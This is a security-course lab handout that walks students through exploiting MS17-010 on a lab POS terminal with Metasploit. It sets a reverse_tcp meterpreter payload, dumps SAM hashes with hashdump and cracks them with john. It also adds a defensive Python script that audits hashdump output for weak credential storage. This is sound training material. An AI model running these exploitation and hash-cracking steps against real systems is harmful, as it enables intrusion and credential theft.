Week 7 Lab – Hacking a POS terminal
As you have learned, an embedded system such as a point-of-sale terminal can suffer from many of the same vulnerabilities as a normal server or user workstation. As such, many of the techniques we are going to use to attempt to harvest credentials are the same ones you would use on a regular workstation.
You have been given the IP address of the POS terminal you are to target, so you won’t need to scan to locate the host on the network, but we would still like you to scan, enumerate, and search for vulnerabilities. Refer back to your earlier labs to complete the next two actions. You must do this lab from your Kali VM.
Using Sparta scan/enumerate the POS terminal at the IP address you were given. Provide a screen shot showing the open ports. What else did you find of value in your scan?
Now use OpenVAS to check for vulnerabilities. Provide a screen shot showing the first page of the scan report for the POS terminal. This page should show the high severity vulnerabilities.
Through your vulnerability scans you learned the POS terminal has the vulnerability known as Microsoft Windows SMB Server Multiple Vulnerabilities. It is also known as MS17-010 and covers CVE-2017-0143, -0144, -0145, -0146, -0147 and -0148. This is a major vulnerability. It carries a CVSS score of 10 and could allow us a great deal of access to the host. The goal of this lab will be to harvest the credentials present on the POS terminal. We will do this by exploiting the MS17-010 vulnerability using a tool called Metasploit, extracting the hashed credentials from the Windows SAM file, and cracking them using the tool john. Lots to do, so let’s get started.
Now that you know your target IP and a potentially exploitable vulnerability, we can move on to our next task, which we will do through Metasploit. The Metasploit framework provides a common structure from which to launch various exploits and their associated payloads. In addition to launching exploits others have written, you can write your own exploits and payloads. To start Metasploit use the ‘Applications’ menu, select the ‘Exploitation Tools’ menu, and select Metasploit. The first time you use Metasploit it will initialize its database, which may take a few minutes. Once that is complete it will finish loading and present you with a random piece of ASCII art. Your screen will differ from the below, but your last line should be a msf> prompt.
Normally your next step would be to issue the command msfupdate to update the database and associated exploits. As the toxic pool is not connected to the internet, you will skip this step. Metasploit was updated when the Kali VM was built.
Next we will see if Metasploit has an exploit for the MS17-010 vulnerability we found on our target host. Enter the following command:
We are rewarded with a list of the available exploits. In addition to the name of the exploit and a description of what it does, you will see a ranking of its likelihood of success. Metasploit ranks exploits from lowest to highest as: manual, low, average, normal, good, great, excellent. Keep in mind an exploit may not always be successful.
We will be using the second listed exploit. To load the exploit issue the use command with the name of the desired exploit.
Now that we have loaded the exploit we need to set the payload. Payloads can do any number of tasks such as open vnc sessions or launch a meterpreter shell on the target system. The meterpreter shell launches in the target’s memory so no record is left on the systems drives. The shell provides access to the host to do any number of additional activities. Our first step is to see what payloads are available with this exploit. To do that enter the following command:
You will see a pretty extensive list of potential payloads. We are interested in the one which will launch a reverse_tcp meterpreter shell. We’ve already talked about the shell, but you will note many of the payloads come in two variations, one which says bind and one which says reverse_tcp. These are two different types of connections. With the bind variant the payload is loaded on the target system and waits for you to make a connection to it. With the reverse_tcp variant the payload is delivered and the target starts a connection back to your system. The command to set the payload is:
set payload windows/x64/meterpreter/reverse_tcp
Each payload may have options which need to be set to specify how the payload will act. To see what options are available, use the command show options.
Options are shown as required or optional. This payload has two required options which have not yet been set, RHOST (remote host, the IP of your target) and LHOST (local host, your IP). Issue the following two commands, providing your specific target and Kali IP. Remember you determined your target’s IP at the beginning of the lab and you can find your IP by using the command ifconfig in a terminal window.
To make sure you have set LHOST and RHOST correctly use the command show options again.
Paste a screen dump of your options screen showing RHOST and LHOST set for your target and Kali VM.
We have now specified the exploit, the payload, and set the payload options. It’s now time to launch our attack. Issue the following command:
The command may take a while to execute. You can monitor its progress through the onscreen messages as it exploits the vulnerability we found earlier. Your hope is that the exploit will eventually be successful and you will be rewarded with a WIN and a shell prompt. You may need to attempt the exploit more than once.
There are many activities we could do from here, but our goal is to dump the user credentials on this system. Windows passwords are stored locally in the SAM file. Windows locks this file so that it cannot be accessed by any user while the system is running. One way to copy the file is to get physical access to the computer, boot it to a live CD or external drive, and then mount the system drive. The meterpreter shell gives us a way to do this remotely through the command hashdump. Issue that command at your meterpreter prompt.
What you are provided with is a list of users and their hashed passwords. Yours will be different than the above. We need to copy this information and use the program john to try to crack the passwords. Highlight the user/hash information and copy it to your clipboard.
Once you have copied the information go to a new terminal window and create a new file with gedit.
Right click to paste the windows credentials, save, and close the file.
Once this file is closed you can return to your Metasploit window and use the command quit twice, once to quit the meterpreter shell and once to quit Metasploit.
John is a password cracker with several capabilities. You will use the default configuration, which attempts to crack the passwords first through a dictionary attack and then through a brute-force effort. During some pentests you may choose to build your own dictionary based on words related to the company (product names, users, mascots, etc.) that you find during your open-source collection. The default dictionary is based on common passwords.
You can attempt to crack the passwords in the target file with the following command:
john hashes.txt --format=nt
The option --format=nt tells john that the hashes are NT (NTLM) hashes.
As john runs it will print each username together with the password it recovered. This technique will not always be successful, but it’s a good one to try.
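Before handing hashdump output to john, it helps to understand what the hashes are. Each line is user:RID:LM hash:NT hash:::, and the NT hash is simply MD4 of the password encoded as UTF-16LE, with no salt. The following added example (not part of the lab, and not code from Metasploit or john) implements that computation and then audits a constructed hashdump sample from a defender’s point of view: it flags accounts with a blank password, accounts whose SAM still stores a legacy LM hash, and accounts that share an NT hash, which is only visible because the hash is unsalted. The account names and the non-blank LM value in the sample are constructed; the NT hash values are the well-known hashes of an empty password and of the word "password". MD4 is implemented in pure Python because hashlib’s md4 is disabled on many current systems.

```python
"""Audit hashdump/pwdump-format output for weak credential storage (added example)."""
import struct
from collections import defaultdict

# Constructed sample in hashdump format: user:RID:LM hash:NT hash:::
# Account names are made up; the LM value on the last line is a constructed
# non-blank value standing in for "LM storage was left enabled".
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
posuser:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
"""

# LM field value written when no LM hash is stored (LM storage disabled).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often unavailable."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)  # bit length, little-endian
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f1 = lambda x, y, z: (x & y) | (~x & z)
    f2 = lambda x, y, z: (x & y) | (x & z) | (y & z)
    f3 = lambda x, y, z: x ^ y ^ z
    rounds = [
        (f1, 0x00000000, range(16), (3, 7, 11, 19)),
        (f2, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (f3, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    ]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = h[:]
        for func, const, order, shifts in rounds:
            for step, k in enumerate(order):
                t = (-step) % 4  # operate on a, d, c, b in turn
                mix = v[t] + func(v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]) + x[k] + const
                v[t] = _rotl(mix & 0xFFFFFFFF, shifts[step % 4])
        h = [(a + b) & 0xFFFFFFFF for a, b in zip(h, v)]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), unsalted, returned as lowercase hex."""
    return md4(password.encode("utf-16-le")).hex()


def parse_hashdump(text: str) -> list:
    """Parse user:RID:LM:NT::: lines into dictionaries."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"unexpected hashdump line: {line!r}")
        records.append({"user": parts[0], "rid": int(parts[1]),
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return records


def audit_hashdump(text: str) -> list:
    """Return (account, finding) pairs a defender would want to act on."""
    findings = []
    blank_nt = nt_hash("")
    by_nt = defaultdict(list)
    for r in parse_hashdump(text):
        if r["nt"] == blank_nt:
            findings.append((r["user"], "blank password"))
        if r["lm"] != EMPTY_LM:
            findings.append((r["user"], "legacy LM hash stored"))
        by_nt[r["nt"]].append(r["user"])
    # Unsalted hashes mean identical passwords give identical hashes.
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != blank_nt:
            findings.append((",".join(users), "shared NT hash (password reuse)"))
    return findings


if __name__ == "__main__":
    for account, finding in audit_hashdump(SAMPLE_HASHDUMP):
        print(f"{account}: {finding}")
```

The shared-hash finding is the key lesson behind --format=nt: because the NT hash has no salt, john only needs to hash each dictionary word once and compare it against every account at the same time, which is why a short common-password list recovers so many accounts so quickly. Enforcing LM-free storage, eliminating blank passwords, and preventing reuse are the corresponding mitigations.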
Provide a screenshot of the usernames and passwords you found
EXTRA CREDIT (5pts)
Review the scans you did earlier with Sparta. Given those results and the credentials you now possess you have the information necessary to access the POS terminal. Once you have access look around and locate a flag placed somewhere on the system. The flag is an obvious file and it’s not buried deep.
You should not use metasploit as part of completing the extra credit portion of this assignment.
To earn the extra credit write a summary of how you gained access, where you found the flag, and the flag’s title and message.